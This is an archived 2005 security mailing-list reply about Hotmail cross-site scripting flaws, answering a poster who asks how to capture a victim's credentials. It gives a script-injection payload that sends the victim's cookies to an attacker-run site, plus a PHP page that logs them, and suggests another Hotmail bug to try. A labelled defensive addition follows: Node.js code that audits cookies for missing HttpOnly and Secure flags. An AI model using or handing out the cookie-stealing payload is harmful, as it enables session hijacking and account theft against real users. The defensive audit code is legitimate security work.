Date: Wed, 4 May 2005 14:41:15 +0200
From: "Jerome Athias" <jerome.athias@...e.fr>
To: "Sherwyn Williams" <sherwill22@...il.com>,
    "Luis A. Cortes Zavala" <luis.cortes@...ersec.co.uk>,
    <full-disclosure@...ts.grok.org.uk>,
    <vulnwatch@...nwatch.org>,
    <bugtraq@...urityfocus.com>
Subject: Re: Re: [VulnWatch] Hotmail Advisories

> Ok I think I get what you are saying, however to use this vuln, would
> need to have a script running on a server somewhere that receives the
> username and password?
>
> Or just based on what you have here this can be possible. If one does not
> have knowledge of java script, all they would have to do is use those
> various html codes you wrote and send that to them as an attachment, but
> how would I get the username and password ????

For example, this is a simple way to steal a cookie:

Inject this code:

    <script>window.open('http://www.your-malware-website.com/givemecook.php?cook='%2Bdocument.cookie);</script>

And on "your-malware-website" put this page:

givemecook.php:

    <? echo $HTTP_COOKIE_VARS["cook"]; ?>

and so, the cookie will be logged in "your-malware-website"

>> I was testing this until I can get some working code, the authorization
>> and validation of the site is one of the better that I have seen on a
>> mailing system, I never heard about vulnerabilities of hotmail as in
>> other systems, I just have knowledge of two flaws discovered. One in
>> 1999 is from George Guninski, and the other when the pwdreset function
>> make its public, every year hotmail is updated, and getting more secure,
>> and it's hard to believe that no one has found this before.

Try to play with this in hotmail
http://seclists.org/lists/bugtraq/2005/Feb/0473.html

Cheers,
Jerome

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
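
A defender's check for the cookie theft described in this thread, added here as an example that is not part of the original message: injected script reads cookies through document.cookie, which only exposes cookies set without the HttpOnly attribute, so this Node.js code audits a response's Set-Cookie headers and reports which cookies such a script could read. The function names and the sample headers are constructed for illustration.

```javascript
// Added example (not from the thread): find cookies that injected script
// could read through document.cookie. Names and sample data are constructed.

// Parse one Set-Cookie header value into { name, value, attrs }.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const first = parts.shift() || '';
  const eq = first.indexOf('=');
  if (eq < 1) return null; // no usable name=value pair: skipped by this audit
  const attrs = {};
  for (const part of parts) {
    const i = part.indexOf('=');
    const key = (i === -1 ? part : part.slice(0, i)).trim().toLowerCase();
    attrs[key] = i === -1 ? true : part.slice(i + 1).trim();
  }
  return { name: first.slice(0, eq).trim(), value: first.slice(eq + 1).trim(), attrs };
}

// Return one finding per cookie: readable by script? sent over plain HTTP?
function auditCookies(setCookieHeaders) {
  const findings = [];
  for (const header of setCookieHeaders) {
    const c = parseSetCookie(header);
    if (!c) continue;
    findings.push({
      name: c.name,
      scriptReadable: !('httponly' in c.attrs), // visible in document.cookie
      sentOverHttp: !('secure' in c.attrs),     // also exposed on the wire
    });
  }
  return findings;
}

// Names of the cookies that lack HttpOnly and are therefore script-readable.
function exposedToScript(setCookieHeaders) {
  return auditCookies(setCookieHeaders)
    .filter((f) => f.scriptReadable)
    .map((f) => f.name);
}

// Constructed sample response headers for a webmail login.
const SAMPLE_HEADERS = [
  'SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Lax',
  'AUTHTOKEN=deadbeef; Path=/; Domain=.mail.example',
  'lang=en-US; Path=/; Max-Age=31536000',
  '=broken; Path=/',
];

console.log('Readable by injected script:', exposedToScript(SAMPLE_HEADERS));
```

Any authentication cookie that appears in the output is the one to fix first, by adding HttpOnly (and Secure) where the application sets it.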